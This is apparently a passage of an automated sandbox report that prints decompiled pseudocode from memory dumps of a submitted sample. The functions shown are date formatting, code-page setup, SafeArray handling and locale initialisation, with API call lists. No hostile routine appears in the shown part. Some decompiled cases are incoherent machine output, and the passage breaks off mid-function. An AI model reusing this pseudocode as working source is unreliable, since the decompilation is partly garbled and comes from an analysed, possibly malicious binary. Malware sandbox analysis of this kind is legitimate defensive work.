    			E00409161(void* __ecx, void* __edx, void* __edi) {
    				signed int _t166;
    				signed int _t168;
    				signed int _t170;
    				signed int _t172;
    				signed int _t181;
    				void* _t183;
    				intOrPtr _t224;
    				intOrPtr _t227;
    				signed int _t232;
    				void* _t250;
    				void* _t252;
    				intOrPtr _t272;
    				signed int _t281;
    				void* _t282;
    
    				L0:
    				while(1) {
    					L0:
    					E004089D8(_t282);
    					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
    					if(E004077C0(_t281, 5, 0x409418) != 0) {
    						_t166 = E004077C0(_t281, 3, 0x409420);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							_t168 = E004077C0(_t281, 4, 0x409424);
    							__eflags = _t168;
    							if(_t168 != 0) {
    								_t170 = E004077C0(_t281, 4, 0x40942c);
    								__eflags = _t170;
    								if(_t170 != 0) {
    									_t172 = E004077C0(_t281, 3, 0x409434);
    									__eflags = _t172;
    									if(_t172 != 0) {
    										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									} else {
    										E004089A0(_t282);
    										_pop(_t250);
    										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
    										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    									}
    								} else {
    									E004089A0(_t282);
    									_pop(_t252);
    									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
    									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								}
    							} else {
    								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    								if( *((short*)(_t282 - 0x16)) >= 0xc) {
    									_t224 =  *0x454694; // 0x0
    									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
    								} else {
    									_t227 =  *0x454690; // 0x0
    									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
    								}
    								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								 *((char*)(_t282 - 0x1e)) = 1;
    							}
    						} else {
    							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    							if( *((short*)(_t282 - 0x16)) >= 0xc) {
    								__eflags = _t281;
    							}
    							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    							 *((char*)(_t282 - 0x1e)) = 1;
    						}
    					} else {
    						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
    						if( *((short*)(__ebp - 0x16)) >= 0xc) {
    							__esi = __esi + 3;
    							__eflags = __esi;
    						}
    						__eax =  *(__ebp + 8);
    						__edx = 2;
    						__eax = __esi;
    						__eax = E004088C4(2,  *(__ebp + 8));
    						 *(__ebp - 4) =  *(__ebp - 4) + 4;
    						 *((char*)(__ebp - 0x1e)) = 1;
    					}
    					while(1) {
    						L109:
    						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
    						if(_t164 == 0) {
    							break;
    						}
    						L1:
    						 *(_t282 - 5) = _t164;
    						asm("bt [0x419108], eax");
    						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t181 =  *(_t282 - 5);
    							__eflags = _t181 + 0x9f - 0x1a;
    							if(_t181 + 0x9f - 0x1a < 0) {
    								_t181 = _t181 - 0x20;
    								__eflags = _t181;
    							}
    							L5:
    							__eflags = _t181 + 0xbf - 0x1a;
    							if(_t181 + 0xbf - 0x1a >= 0) {
    								L10:
    								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
    								__eflags = _t183 - 0x38;
    								if(_t183 > 0x38) {
    									L108:
    									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									continue;
    								}
    								L11:
    								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
    									case 0:
    										goto L108;
    									case 1:
    										L12:
    										E00408974(_t282);
    										E004089A0(_t282);
    										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
    										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
    											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
    										} else {
    											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
    										}
    										goto L109;
    									case 2:
    										L15:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x24;
    										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
    										__eax =  *(__ebp - 0x24);
    										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 3:
    										L16:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x28;
    										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
    										__eax =  *(__ebp - 0x28);
    										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 4:
    										L17:
    										E00408974(__ebp) = E004089A0(__ebp);
    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										if(__eflags < 0) {
    											__eax =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
    												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
    											} else {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											}
    										}
    										goto L109;
    									case 5:
    										L23:
    										E00408974(__ebp) =  *(__ebp - 0xc);
    										__eax =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags = __eax;
    										if(__eflags < 0) {
    											E004089A0(__ebp) =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											} else {
    												__eax = __eax - 1;
    												__eflags = __eax;
    												if(__eflags == 0) {
    													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
    													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    												} else {
    													__eax = __eax - 1;
    													__eflags = __eax;
    													if(__eax == 0) {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454684; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													} else {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454688; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													}
    												}
    											}
    										}
    										goto L109;
    									case 6:
    										L33:
    										__eax = E00408974(__ebp);
    										__eax = E004089D8(__ebp);
    										 *(__ebp - 0x1f) = 0;
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L52:
    											__al =  *__esi;
    											__eflags =  *__esi;
    											if( *__esi == 0) {
    												break;
    											}
    											L34:
    											__eax = __eax & 0x000000ff;
    											__eflags = __eax;
    											asm("bt [0x419108], eax");
    											if(__eax >= 0) {
    												L36:
    												__eax = 0;
    												__al =  *__esi;
    												__eflags = 0 - 0x48;
    												if(0 > 0x48) {
    													L42:
    													__eax = 0xffffffffffffff9f;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														L45:
    														__eflags =  *(__ebp - 0x1f);
    														if( *(__ebp - 0x1f) != 0) {
    															L51:
    															__esi = __esi + 1;
    															__eflags = __esi;
    															continue;
    														}
    														L46:
    														__edx = 0x409418;
    														__ecx = 5;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 5, 0x409418);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L49:
    															 *((char*)(__ebp - 0x1e)) = 1;
    															break;
    														}
    														L47:
    														__edx = 0x409420;
    														__ecx = 3;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 3, 0x409420);
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L49;
    														}
    														L48:
    														__edx = 0x409424;
    														__ecx = 4;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 4, 0x409424);
    														__eflags = __eax;
    														if(__eax != 0) {
    															break;
    														}
    														goto L49;
    													}
    													L43:
    													__eax = 0xffffffffffffff98;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														break;
    													}
    													L44:
    													goto L51;
    												}
    												L37:
    												if(0 == 0x48) {
    													break;
    												}
    												L38:
    												__eax = 0xffffffffffffffde;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													L50:
    													__al =  *(__ebp - 0x1f);
    													__al =  *(__ebp - 0x1f) ^ 0x00000001;
    													__eflags = __al;
    													 *(__ebp - 0x1f) = __al;
    													goto L51;
    												}
    												L39:
    												__eax = 0xffffffffffffffd9;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L50;
    												}
    												L40:
    												__eax = 0xffffffffffffffbf;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L45;
    												}
    												L41:
    												goto L51;
    											} else {
    												__eax = __esi;
    												__eax = E0040B044(__esi);
    												__esi = __eax;
    												continue;
    											}
    										}
    										L53:
    										__ax =  *((intOrPtr*)(__ebp - 0x16));
    										__eflags =  *((char*)(__ebp - 0x1e));
    										if( *((char*)(__ebp - 0x1e)) != 0) {
    											__eflags = __ax;
    											if(__ax != 0) {
    												__eflags = __ax - 0xc;
    												if(__ax > 0xc) {
    													__ax = __ax - 0xc;
    													__eflags = __ax;
    												}
    											} else {
    												__ax = 0xc;
    											}
    										}
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__edx =  *(__ebp + 8);
    										__eax = __ax & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 7:
    										L61:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 8:
    										L64:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 9:
    										L67:
    										__eax = E00408974(__ebp);
    										__eflags =  *(__ebp - 0xc) - 1;
    										if( *(__ebp - 0xc) != 1) {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										} else {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x454698; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										}
    										goto L109;
    									case 0xa:
    										L70:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 3;
    										if( *(__ebp - 0xc) > 3) {
    											 *(__ebp - 0xc) = 3;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 0xb:
    										goto L0;
    									case 0xc:
    										L90:
    										E00408974(__ebp) =  *(__ebp + 8);
    										__eax =  *0x454684; // 0x0
    										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										__eax = E004089D8(__ebp);
    										__eflags =  *((short*)(__ebp - 0x16));
    										if( *((short*)(__ebp - 0x16)) != 0) {
    											L93:
    											 *(__ebp + 8) = 0x409438;
    											__edx = 1;
    											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    											goto L109;
    										}
    										L91:
    										__eflags =  *(__ebp - 0x18);
    										if( *(__ebp - 0x18) != 0) {
    											goto L93;
    										}
    										L92:
    										__eflags =  *(__ebp - 0x1a);
    										if( *(__ebp - 0x1a) == 0) {
    											goto L109;
    										}
    										goto L93;
    									case 0xd:
    										L94:
    										__eflags =  *0x454681;
    										__eflags = __eax - 0x454681;
    										 *__edi =  *__edi + __cl;
    										__eflags =  *(__ecx - 0x75000000) & __bl;
    									case 0xe:
    										L97:
    										__eflags =  *0x45468c;
    										__eflags = __eax - 0x45468c;
    										_t136 = __edi + __esi * 2 - 0x75;
    										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
    										__eflags =  *_t136;
    									case 0xf:
    										L100:
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L104:
    											__eax =  *(__ebp - 4);
    											__al =  *__eax;
    											__eflags = __al;
    											if(__al == 0) {
    												break;
    											}
    											L105:
    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
    											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
    												L101:
    												__eax = __eax & 0x000000ff;
    												__eflags = __eax;
    												asm("bt [0x419108], eax");
    												if(__eax >= 0) {
    													_t146 = __ebp - 4;
    													 *_t146 =  *(__ebp - 4) + 1;
    													__eflags =  *_t146;
    												} else {
    													__eax =  *(__ebp - 4);
    													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
    												}
    												continue;
    											}
    											break;
    										}
    										L106:
    										__eax =  *(__ebp + 8);
    										__edx =  *(__ebp - 4);
    										__edx =  *(__ebp - 4) - __esi;
    										__esi = E004088C4(__edx,  *(__ebp + 8));
    										__eax =  *(__ebp - 4);
    										__eflags =  *__eax;
    										if( *__eax != 0) {
    											 *(__ebp - 4) =  *(__ebp - 4) + 1;
    										}
    										goto L109;
    								}
    							} else {
    								__eflags = _t181 - 0x4d;
    								if(_t181 == 0x4d) {
    									__eflags = _t232 - 0x48;
    									if(_t232 == 0x48) {
    										_t181 = 0x4e;
    									}
    								}
    								L9:
    								_t232 = _t181;
    								goto L10;
    							}
    						} else {
    							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t232 = 0x20;
    							continue;
    						}
    					}
    					L110:
    					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
    					_pop(_t272);
    					 *[fs:eax] = _t272;
    					_push(E00409410);
    					return E00403EAC(_t282 - 0x28, 2);
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 91%
    			E030061B7(void* __ecx, void* __edx, void* __eflags, int _a4, int _a8) {
    				signed int _v8;
    				char _v21;
    				char _v22;
    				struct _cpinfo _v28;
    				signed int _v32;
    				int _v36;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t53;
    				int _t56;
    				signed char _t59;
    				int _t61;
    				short* _t62;
    				signed int _t66;
    				signed char* _t78;
    				signed int _t81;
    				int _t82;
    				signed int _t85;
    				intOrPtr* _t86;
    				int _t91;
    				signed char _t92;
    				signed int _t93;
    				int _t95;
    				int _t97;
    				signed int _t98;
    				signed int _t101;
    				intOrPtr* _t104;
    				signed int _t105;
    
    				_t53 =  *0x300bbe4; // 0xbb40e64e
    				_v8 = _t53 ^ _t105;
    				_t82 = _a8;
    				_t97 = E0300613B(_a4);
    				_t100 = 0;
    				_a4 = _t97;
    				if(_t97 != 0) {
    					_v32 = 0;
    					_t56 = 0;
    					__eflags = 0;
    					while(1) {
    						__eflags =  *((intOrPtr*)(_t56 + 0x300b880)) - _t97;
    						if( *((intOrPtr*)(_t56 + 0x300b880)) == _t97) {
    							break;
    						}
    						_v32 = _v32 + 1;
    						_t56 = _t56 + 0x30;
    						__eflags = _t56 - 0xf0;
    						if(_t56 < 0xf0) {
    							continue;
    						} else {
    							__eflags = _t97 - 0xfde8;
    							if(_t97 == 0xfde8) {
    								L35:
    								_t64 = _t56 | 0xffffffff;
    								__eflags = _t56 | 0xffffffff;
    							} else {
    								__eflags = _t97 - 0xfde9;
    								if(_t97 == 0xfde9) {
    									goto L35;
    								} else {
    									_t56 = IsValidCodePage(_t97 & 0x0000ffff);
    									__eflags = _t56;
    									if(_t56 == 0) {
    										goto L35;
    									} else {
    										_t56 = GetCPInfo(_t97,  &_v28);
    										__eflags = _t56;
    										if(_t56 == 0) {
    											__eflags =  *0x300c654 - _t100; // 0x0
    											if(__eflags != 0) {
    												goto L1;
    											} else {
    												goto L35;
    											}
    										} else {
    											E03006C50(_t82 + 0x1c, _t100, 0x101);
    											_t95 = 1;
    											 *(_t82 + 4) = _t97;
    											 *(_t82 + 0xc) = _t100;
    											__eflags = _v28 - 1;
    											if(_v28 <= 1) {
    												 *(_t82 + 8) = _t100;
    											} else {
    												__eflags = _v22;
    												if(_v22 != 0) {
    													_t104 =  &_v21;
    													while(1) {
    														_t92 =  *_t104;
    														__eflags = _t92;
    														if(_t92 == 0) {
    															goto L29;
    														}
    														_t81 =  *(_t104 - 1) & 0x000000ff;
    														_t93 = _t92 & 0x000000ff;
    														while(1) {
    															__eflags = _t81 - _t93;
    															if(_t81 > _t93) {
    																break;
    															}
    															 *(_t82 + _t81 + 0x1d) =  *(_t82 + _t81 + 0x1d) | 0x00000004;
    															_t81 = _t81 + 1;
    															__eflags = _t81;
    														}
    														_t104 = _t104 + 2;
    														__eflags =  *(_t104 - 1);
    														if( *(_t104 - 1) != 0) {
    															continue;
    														}
    														goto L29;
    													}
    												}
    												L29:
    												_t78 = _t82 + 0x1e;
    												_t91 = 0xfe;
    												do {
    													 *_t78 =  *_t78 | 0x00000008;
    													_t78 =  &(_t78[1]);
    													_t91 = _t91 - 1;
    													__eflags = _t91;
    												} while (_t91 != 0);
    												 *(_t82 + 0xc) = E03005E74( *(_t82 + 4));
    												 *(_t82 + 8) = _t95;
    											}
    											_t97 = _t82 + 0x10;
    											asm("stosd");
    											asm("stosd");
    											asm("stosd");
    											L25:
    											_t100 = _t82;
    											E03005F07(_t82);
    											goto L2;
    										}
    									}
    								}
    							}
    						}
    						goto L36;
    					}
    					E03006C50(_t82 + 0x1c, _t100, 0x101);
    					_t85 = _v32 * 0x30;
    					_v36 = _t100;
    					_t101 = _t85 + 0x300b890;
    					_v32 = _t101;
    					while(1) {
    						L21:
    						__eflags =  *_t101;
    						if( *_t101 == 0) {
    							break;
    						}
    						_t59 =  *(_t101 + 1);
    						__eflags = _t59;
    						if(_t59 != 0) {
    							_t98 =  *_t101 & 0x000000ff;
    							_t66 = _t59 & 0x000000ff;
    							while(1) {
    								__eflags = _t98 - _t66;
    								if(_t98 > _t66) {
    									break;
    								}
    								 *(_t82 + _t98 + 0x1d) =  *(_t82 + _t98 + 0x1d) |  *(_v36 + 0x300b87c);
    								_t66 =  *(_t101 + 1) & 0x000000ff;
    								_t98 = _t98 + 1;
    								__eflags = _t98;
    							}
    							_t97 = _a4;
    							_t101 = _t101 + 2;
    							__eflags = _t101;
    							continue;
    						}
    						break;
    					}
    					_v36 = _v36 + 1;
    					_t101 = _v32 + 8;
    					__eflags = _v36 - 4;
    					_v32 = _t101;
    					if(_v36 < 4) {
    						goto L21;
    					}
    					 *(_t82 + 4) = _t97;
    					 *(_t82 + 8) = 1;
    					_t61 = E03005E74(_t97);
    					 *(_t82 + 0xc) = _t61;
    					_t62 = _t82 + 0x10;
    					_t86 = _t85 + 0x300b884;
    					_t95 = 6;
    					do {
    						 *_t62 =  *_t86;
    						_t86 = _t86 + 2;
    						_t62 = _t62 + 2;
    						_t95 = _t95 - 1;
    						__eflags = _t95;
    					} while (_t95 != 0);
    					goto L25;
    				} else {
    					L1:
    					E03005EA3(_t82);
    					L2:
    					_t64 = 0;
    				}
    				L36:
    				return E03006BA0(_t64, _t82, _v8 ^ _t105, _t95, _t97, _t100);
    			}

    APIs
      • Part of subcall function 0300613B: GetOEMCP.KERNEL32(00000000), ref: 03006164
      • Part of subcall function 0300613B: GetACP.KERNEL32(00000000), ref: 03006187
    • IsValidCodePage.KERNEL32(-00000030), ref: 0300622A
    • GetCPInfo.KERNEL32(00000000,?), ref: 0300623D
    • setSBUpLow.LIBCMT ref: 0300632B
      • Part of subcall function 03005F07: GetCPInfo.KERNEL32(?,?), ref: 03005F28
      • Part of subcall function 03005F07: ___crtGetStringTypeA.LIBCMT ref: 03005FA5
      • Part of subcall function 03005F07: ___crtLCMapStringA.LIBCMT ref: 03005FC5
      • Part of subcall function 03005F07: ___crtLCMapStringA.LIBCMT ref: 03005FEA
    • setSBCS.LIBCMT ref: 030061E4
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040C9FC();
    							E0040D7EC(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040CA04();
    							E0040D7EC(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040D8C4(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040D894(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040CA0C();
    						E0040D7EC(_v780);
    						E0040DB18(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040C598();
    				return E0040D7EC(_v776);
    			}

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B3A0() {
    				char _v152;
    				short _v410;
    				signed short _t14;
    				signed int _t16;
    				int _t18;
    				void* _t20;
    				void* _t23;
    				int _t24;
    				int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t32;
    				signed int _t37;
    				int* _t39;
    				short* _t41;
    				void* _t49;
    
    				 *0x454738 = 0x409;
    				 *0x45473c = 9;
    				 *0x454740 = 1;
    				_t14 = GetThreadLocale();
    				if(_t14 != 0) {
    					 *0x454738 = _t14;
    				}
    				if(_t14 != 0) {
    					 *0x45473c = _t14 & 0x3ff;
    					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x419108, 0x40b4f4, 8 << 2);
    				if( *0x4190c0 != 2) {
    					_t16 = GetSystemMetrics(0x4a);
    					__eflags = _t16;
    					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
    					_t18 = GetSystemMetrics(0x2a);
    					__eflags = _t18;
    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
    					 *0x454744 = _t31;
    					__eflags = _t31;
    					if(__eflags != 0) {
    						return E0040B328(__eflags, _t49);
    					}
    				} else {
    					_t20 = E0040B388();
    					if(_t20 != 0) {
    						 *0x454745 = 0;
    						 *0x454744 = 0;
    						return _t20;
    					}
    					E0040B328(__eflags, _t49);
    					_t37 = 0x20;
    					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x454744 = _t32;
    					__eflags = _t32;
    					if(_t32 != 0) {
    						 *0x454745 = 0;
    						return _t23;
    					}
    					_t24 = 0x80;
    					_t39 =  &_v152;
    					do {
    						 *_t39 = _t24;
    						_t24 = _t24 + 1;
    						_t39 =  &(_t39[0]);
    						__eflags = _t24 - 0x100;
    					} while (_t24 != 0x100);
    					_t26 =  *0x454738; // 0x409
    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
    					_t18 = 0x80;
    					_t41 =  &_v410;
    					while(1) {
    						__eflags =  *_t41 - 2;
    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
    						 *0x454745 = _t37;
    						__eflags = _t37;
    						if(_t37 != 0) {
    							goto L17;
    						}
    						_t41 = _t41 + 2;
    						_t18 = _t18 - 1;
    						__eflags = _t18;
    						if(_t18 != 0) {
    							continue;
    						} else {
